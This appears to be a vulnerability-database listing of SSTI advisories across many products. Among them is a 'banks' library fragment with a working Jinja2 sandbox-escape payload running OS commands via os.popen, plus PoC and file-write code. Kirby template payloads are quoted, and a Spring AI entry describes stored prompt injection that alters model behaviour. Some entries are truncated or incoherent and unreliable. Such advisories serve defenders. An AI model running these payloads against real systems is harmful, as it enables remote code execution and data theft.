Ssti

Remote code execution in Tautulli versions prior to 2.17.1 allows attackers to achieve unauthenticated RCE on fresh installations (pre-setup wizard) by abusing the newsletter custom template directory feature to load a malicious Mako template from an attacker-controlled SMB share. On completed installations the same chain remains exploitable by any authenticated admin. Publicly available exploit code exists per SSVC, and the SSVC framework rates this as automatable with total technical impact, though no CISA KEV listing has been confirmed.

Server-side template injection in Jupyter Enterprise Gateway versions 2.0.0rc2 through 3.2.x allows remote attackers to execute arbitrary Python code and OS commands in the Enterprise Gateway pod by injecting Jinja2 expressions into KERNEL_XXX environment variables sent via the kernel-creation API. Successful exploitation yields the gateway's Kubernetes service account token, which (per the published PoC RBAC dump) carries cluster-impacting verbs over pods, secrets, and persistent volumes - providing a realistic path to full Kubernetes cluster compromise. A working PoC is published in the GHSA advisory (GHSA-f49j-v924-fx9w); no CISA KEV listing at time of analysis.

Remote code execution in Wirtualna Uczelnia (versions up to wu#2016.437.295#0#20260327_105545) allows unauthenticated network attackers to execute arbitrary commands via Server-Side Template Injection in the redirectToUrl endpoint's redirectUrlParameter. The CVSS 4.0 base score of 9.3 reflects no authentication, no user interaction, and high impact across confidentiality, integrity, and availability; no public exploit identified at time of analysis, and the issue is not listed in CISA KEV. Disclosure originated from CERT-PL, indicating a vetted advisory channel for this Polish academic management product.

Server-side template injection in Apache Airflow versions 3.0.0 through 3.2.1 allows low-privilege authenticated users to inject Jinja2 expressions via dag_run.conf parameters that are unsafely interpolated into BashOperator commands, leading to arbitrary command execution in the worker context. The flaw carries a 9.1 CVSS but EPSS sits at just 0.03% (9th percentile), and there is no public exploit identified at time of analysis despite a vendor patch being available. Disclosure occurred via the oss-security mailing list on 2026-05-31 alongside several other Airflow advisories.

Template injection (SSTI) in JetBrains IntelliJ IDEA's Copyright plugin before version 2026.1 enables local code execution when a victim interacts with a maliciously crafted copyright template. The flaw, rooted in CWE-1336 (improper neutralization of template engine special elements), requires both local access and user interaction, and carries a CVSS score of 4.5 (Medium) reflecting these significant constraints. No public exploit or CISA KEV listing has been identified at time of analysis.

Server-side template injection in RAGFlow 0.24.0 and earlier allows any authenticated user to execute arbitrary operating system commands on the host through the Jinja2-based prompt generator (rag/prompts/generator.py). Because RAGFlow installations commonly permit open self-registration, the practical barrier is minimal: an attacker registers an account, builds a Canvas workflow chaining a DuckDuckGo retrieval node with an LLM node, and triggers the SSTI to break out of the Jinja2 sandbox. No public exploit identified at time of analysis, but the vendor security advisory describes the chain explicitly.

Server-side template injection (SSTI) in Dromara lamp-cloud versions 5.6.0 through 5.6.2 exposes the Message Template Handler to remote exploitation by authenticated low-privileged users who can inject malicious Groovy expressions via the DefMsgTemplate.content parameter. The vulnerable function GroovyClassLoader.parseClass compiles and executes attacker-controlled input as Groovy code at runtime. A public proof-of-concept exploit has been disclosed on GitHub, and the vendor has not responded to the coordinated disclosure, leaving no official patch available at time of analysis.

Angular template injection in the Reports functionality of Nozomi Networks Guardian and CMC (versions prior to 26.1.0) allows an authenticated user with report privileges to execute arbitrary Angular template expressions in a victim's browser context. Exploitation requires either the attacker to possess report creation privileges directly, or to socially engineer a victim into importing a crafted malicious report template. Successful exploitation enables modification of application data or disruption of application availability; however, full XSS exploitation and direct information disclosure are explicitly constrained by the product's existing input validation and Content Security Policy configuration. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.

Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. Please note that in the updated version, "Data Resource" records with dataTemplateTypeId = "FTL" are no longer supported. Additionally, in the updated version, the "Ecommerce Customer" security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well.

Server-Side Template Injection in PublicCMS 5.202506.d allows authenticated remote attackers to execute arbitrary code and access sensitive information via the templateResult API endpoint. The vulnerability exists in the TemplateResultDirective.java component, where the templateContent parameter lacks proper sanitization, enabling template engine injection attacks. Publicly available exploit code exists (VulnPlus disclosure), and the vendor has not responded to coordinated disclosure attempts, leaving users without an official patch.

Conversation memory poisoning in VMware Spring AI allows remote unauthenticated attackers to inject malicious input that persists across conversation turns and manipulates AI model behavior. The vulnerability achieves high integrity impact (CVSS 8.2) through stored prompt injection, enabling attackers to alter model responses, extract sensitive context, or bypass application logic without authentication. No active exploitation confirmed at time of analysis, but the network-accessible attack surface and low complexity make this a priority for applications processing user-generated conversational input.

Template injection in Rancher Local Path Provisioner allows Kubernetes cluster operators with ConfigMap edit permissions to escalate privileges to node-level root access. Attackers with write access to the local-path-config ConfigMap can inject malicious Pod templates that bypass security controls, creating privileged containers with full host filesystem access. This enables theft of ServiceAccount tokens from co-located pods, access to other tenants' persistent volume data, and arbitrary modification of host node files. Vendor-released patch: v0.0.36. CVSS 8.7 (High) reflects the high-privilege prerequisite (PR:H) but scope change to container escape (S:C). No public exploit identified at time of analysis, though exploitation is straightforward for authenticated cluster operators.

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(user_input) p.text() # Executes arbitrary command on the host ``` **Setup:** ```bash pip install banks==2.4.1 ``` **PoC script:** ```python from banks import Prompt payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(payload) result = p.text() print(f"[+] Output: {result}") ``` **Confirmed output:** ``` [+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),... text **File-write proof:** ```python from banks import Prompt p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}") p.text() ``` ```bash ls -l /tmp/rce_banks_exec ``` Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise. Fixed in `banks 2.4.2` (PR #74) by switching to `jinja2.sandbox.SandboxedEnvironment`, which blocks the dunder attribute traversal chain this exploit relies on. Developers on `banks <= 2.4.1` should upgrade to `2.4.2` and avoid passing untrusted user input as the template argument to `Prompt()`. - Fix: https://github.com/masci/banks/pull/74 - CVE-2024-41950 (Haystack - identical root cause, CVSS 7.5) - CVE-2025-25362 (spacy-llm - identical root cause) - CWE-1336: Improper Neutralization of Special Elements in a Template Engine

Remote code execution in SEPPmail Secure Email Gateway versions before 15.0.4 allows unauthenticated attackers to execute arbitrary template expressions through a server-side template injection flaw in the GINA UI endpoint. The vulnerability requires no authentication and has low attack complexity, but depends on specific template plugin configurations (CVSS 4.0: 8.3 High with AT:P indicating present attack conditions). No public exploit code or active exploitation confirmed at time of analysis. EPSS data not available.

Server-side template injection in OpenStack Ironic through version 35.x allows authenticated administrators to disclose sensitive information by rendering unsandboxed Jinja2 templates in the instance_info['ks_template'] parameter. The vulnerability requires high-privilege user interaction and has low confidentiality impact with no integrity or availability consequences.

Server-side template injection in LiteLLM Proxy versions 1.80.5 through 1.83.6 allows authenticated users to execute arbitrary code via the POST /prompts/test endpoint. Any user with a valid proxy API key can submit malicious prompt templates that escape sandboxing and run commands in the proxy server process, exposing environment secrets like provider API keys and database credentials. This vulnerability affects deployments using LiteLLM as an AI gateway proxy server. No active exploitation confirmed (not in CISA KEV), but GitHub advisory and patch are publicly available, increasing exploit likelihood. CVSS 8.6 (High) with network attack vector and low complexity, though PR:L requirement limits exposure to authenticated attackers only.

Server-side template injection in AstrBot Dashboard API (version 4.22.1 and earlier) allows remote authenticated attackers with high privileges to execute arbitrary template code via the create_template function, leading to information disclosure and potential code execution. Publicly available exploit code exists, and the vendor has not yet responded to disclosure despite early notification.

{{ query }}` or `{< query >}` that are then evaluated to a static value. Because the queries are defined in the blueprint, they can be trusted and cannot be controlled by attackers. However, dynamic options can often not be trusted. This is why the "options from query" and "options from API" modes are intended to resolve the option values and text strings based on queries not defined within the data source but within the blueprint. Unfortunately, the results of these trusted queries on untrusted source data are run through the query parser a second time in affected Kirby releases. Because of the double-resolution of dynamic option values and text strings, attackers could place malicious query templates such as `{{ users.first.password }}` or `{{ page.delete }}` in the option sources such as page titles or external API data controlled by the attacker. These queries would then be executed when the field is loaded in the Panel. When the attacker directly accesses the respective Panel view, they could get access to information normally hidden from them. As the malicious query templates are loaded for all users, it could also lead to malicious write access when another user with a higher permission level accesses the manipulated Panel view. The problem has been patched in [Kirby 4.9.0](https://github.com/getkirby/kirby/releases/tag/4.9.0) and [Kirby 5.4.0](https://github.com/getkirby/kirby/releases/tag/5.4.0). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability. In all of the mentioned releases, Kirby has updated the `Options` logic to no longer double-resolve queries in option values coming from `OptionsQuery` or `OptionsApi` sources. Kirby now only resolves queries that are directly configured in the blueprints. Kirby thanks to @offset for responsibly reporting the identified issue.

Sandbox escape in JetBrains YouTrack before 2025.3.131383 allows high-privileged users to execute arbitrary code on the server. The vulnerability affects all YouTrack versions prior to 2025.3.131383 and is classified as both an authentication bypass and server-side template injection (SSTI). EPSS scoring indicates 0% exploitation probability with no evidence of active exploitation or public POCs. Despite a CVSS score of 7.2, the requirement for high-level administrative privileges significantly constrains real-world attack surface to insider threats or compromised admin accounts.

Remote code execution in giskard-checks through server-side template injection (SSTI) in the ConformityCheck class allows arbitrary Python code execution when the rule parameter is processed via unsandboxed Jinja2 template rendering. Affected versions prior to 1.0.2b1 silently interpret rule strings as Jinja2 templates, enabling attackers with write access to check definitions or configuration files to inject malicious template expressions that execute during test suite execution. Exploitation requires local file write access and subsequent developer execution of the test suite, but the implicit template evaluation increases risk when untrusted check definitions are integrated from shared projects or external sources.

Server-Side Template Injection in OpenCTI notifier templates allows privileged administrators with 'Manage customization' capability to execute arbitrary JavaScript in the platform process context. Affecting all versions prior to 6.9.5, this vulnerability permits authenticated high-privilege users to achieve complete system compromise through unsafe EJS template rendering in safeEjs.ts. No public exploit code identified and EPSS score of 0.07% indicates low observed exploitation probability, but CVSS 9.1 Critical rating reflects the total technical impact once privileged access is obtained. Vendor patch released in version 6.9.5.

Remote code execution in InvenTree 1.2.3 through 1.2.6 allows staff users with settings access to execute arbitrary code by crafting malicious Jinja2 templates that bypass sandbox validation. The vulnerability exists because the PART_NAME_FORMAT validator uses a sandboxed Jinja2 environment, but the actual rendering engine in part/helpers.py uses an unsandboxed environment, combined with a validation bypass via dummy Part instances with pk=None that behave differently during validation versus production execution. No public exploit code or active exploitation confirmed at time of analysis.

Server-side template injection in PyBlade's AST validation function (_is_safe_ast in sandbox.py) allows authenticated remote attackers to bypass template safety checks and inject arbitrary template code, leading to information disclosure and potential code execution. Affected versions 0.1.8-alpha and 0.1.9-alpha contain improper neutralization of special template elements. Publicly available exploit code exists, though the vendor has not yet responded to disclosure.

Remote code execution in BentoML's containerization workflow allows attackers to execute arbitrary Python code on victim machines by distributing malicious bento archives containing SSTI payloads. When victims import a weaponized bento and run 'bentoml containerize', unsanitized Jinja2 template rendering executes attacker-controlled code directly on the host system - bypassing all Docker container isolation. The vulnerability stems from using an unsandboxed jinja2.Environment with the dangerous jinja2.ext.do extension to process user-provided dockerfile_template files. Authentication is not required (CVSS PR:N), though exploitation requires user interaction (UI:R) to import and containerize the malicious bento. No public exploit identified at time of analysis, though the GitHub advisory includes detailed proof-of-concept demonstrating host filesystem compromise.

Server-side template injection in OpenOlat e-learning platform versions prior to 19.1.31, 20.1.18, and 20.2.5 enables authenticated users with Author role to execute arbitrary operating system commands via crafted Velocity directives in reminder email templates. Exploitation requires low-privilege authentication (PR:L) but is network-accessible (AV:N) with low complexity (AC:L), achieving full system compromise (C:H/I:H/A:H). The vulnerability leverages Java reflection through Velocity templates to instantiate ProcessBuilder and execute commands with Tomcat process privileges, often root in containerized environments. EPSS data not provided; no CISA KEV status confirmed; publicly available exploit code exists per GitHub security advisory disclosure.

Remote code execution in giskard-agents Python library (versions ≤0.3.3 and 1.0.x alpha) allows attackers to execute arbitrary system commands when user-controlled strings are passed to the ChatWorkflow.chat() method. The vulnerability stems from unsandboxed Jinja2 template rendering that enables class traversal exploitation via Python's object introspection. Patched in versions 0.3.4 (stable) and 1.0.2b1 (pre-release). Public exploit code exists demonstrating full RCE via Jinja2 object traversal to os.popen(). No active exploitation confirmed at time of analysis, though the straightforward attack vector and clear POC make this a critical priority for affected deployments.

Incus system container and virtual machine manager versions prior to 6.23.0 allow authenticated users with instance access to read and write arbitrary files as root on the host system through exploitation of pongo2 template processing. The vulnerability (scored CVSS 10.0 critical) stems from a bypassed chroot isolation mechanism that was intended to confine template operations to instance filesystems but instead permits unrestricted host filesystem access. No public exploit identified at time of analysis, though the vulnerability is tagged as Server-Side Template Injection (SSTI) with a GitHub security advisory published.

A security vulnerability in renders user-supplied template content (CVSS 8.5) that allows an authenticated user with access. High severity vulnerability requiring prompt remediation. Vendor patch is available.

JumpServer contains a Server-Side Template Injection (SSTI) vulnerability in its Applet and VirtualApp upload functionality that allows authenticated administrators to execute arbitrary code within the JumpServer Core container. The vulnerability affects JumpServer versions vulnerable to unsafe Jinja2 template rendering of user-uploaded YAML manifest files. While requiring high privilege level (Application Applet Management or Virtual Application Management permissions), successful exploitation results in complete container compromise with high confidentiality, integrity, and availability impact.

An issue was discovered in Logpoint before 7.7.0. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

LangChain is a framework for building agents and LLM-powered applications. Rated high severity (CVSS 8.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

The Advanced Views - Display Posts, Custom Fields, and More plugin for WordPress is vulnerable to Server-Side Template Injection in all versions up to, and including, 3.7.19. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

jinjava is a Java-based template engine based on django template syntax, adapted to render jinja templates. Rated critical severity (CVSS 9.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Agiloft Release 28 does not properly neutralize special elements used in an EUI template engine, allowing an authenticated attacker to achieve remote code execution by loading a specially crafted. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Craft is a platform for creating digital experiences. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, low attack complexity.

Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Crocoblock JetEngine allows Code Injection.7.0. Rated high severity (CVSS 8.5), this vulnerability is remotely exploitable. No vendor patch available.

Invision Community 5.0.0 through 5.0.6 contains an unauthenticated remote code execution vulnerability in the template engine's themeeditor.php. By crafting template conditional strings using PHP's alternative function call syntax, attackers bypass security filters and execute arbitrary PHP code on the server.

Craft is a content management system. Rated high severity (CVSS 7.3), this vulnerability is remotely exploitable, low attack complexity.

Dell PowerProtect Data Manager Reporting, version(s) 19.16, 19.17, 19.18, contain(s) an Improper Neutralization of Special Elements Used in a Template Engine vulnerability. Rated low severity (CVSS 2.3), this vulnerability is low attack complexity. No vendor patch available.

IPW Systems Metazo through 8.1.3 allows unauthenticated Remote Code Execution because smartyValidator.php enables the attacker to provide template expressions, aka Server-Side Template-Injection. Rated critical severity (CVSS 10.0), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

wikiplugin_includetpl in lib/wiki-plugins/wikiplugin_includetpl.php in Tiki before 28.3 mishandles input to an eval. Rated critical severity (CVSS 9.9), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

AutoGPT versions 0.3.4 and earlier are vulnerable to a Server-Side Template Injection (SSTI) that could lead to Remote Code Execution (RCE). Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

In version 3.22.0 of aimhubio/aim, the AimQL query language uses an outdated version of the safer_getattr() function from RestrictedPython. Rated high severity (CVSS 8.1), this vulnerability is remotely exploitable, no authentication required. Public exploit code available and no vendor patch available.

Jinja is an extensible templating engine. Rated medium severity (CVSS 5.4), this vulnerability is low attack complexity.

Report generation functionality in Wyn Enterprise allows for code inclusion, but not sufficiently limits what code might be included. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

An issue was discovered in Logpoint AgentX before 1.5.0. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A host header injection vulnerability exists in the NPM package of perfood/couch-auth <= 0.21.2. Rated high severity (CVSS 7.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

OneBlog v2.3.6 was discovered to contain a template injection vulnerability via the template management department. Rated high severity (CVSS 8.0), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical severity (CVSS 9.9), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

The Dynamics 365 Integration plugin for WordPress is vulnerable to Remote Code Execution and Arbitrary File Read in all versions up to, and including, 1.3.23 via Twig Server-Side Template Injection. Rated critical severity (CVSS 9.9), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Remote code execution in the WPML WordPress multilingual plugin (versions up to and including 4.6.12) allows Contributor-level authenticated users to execute arbitrary code on the underlying server via Twig Server-Side Template Injection in the shortcode render function. Publicly available exploit code exists and EPSS rates the exploitation probability at 73.91% (99th percentile), making this a high-priority issue for any WordPress site running WPML.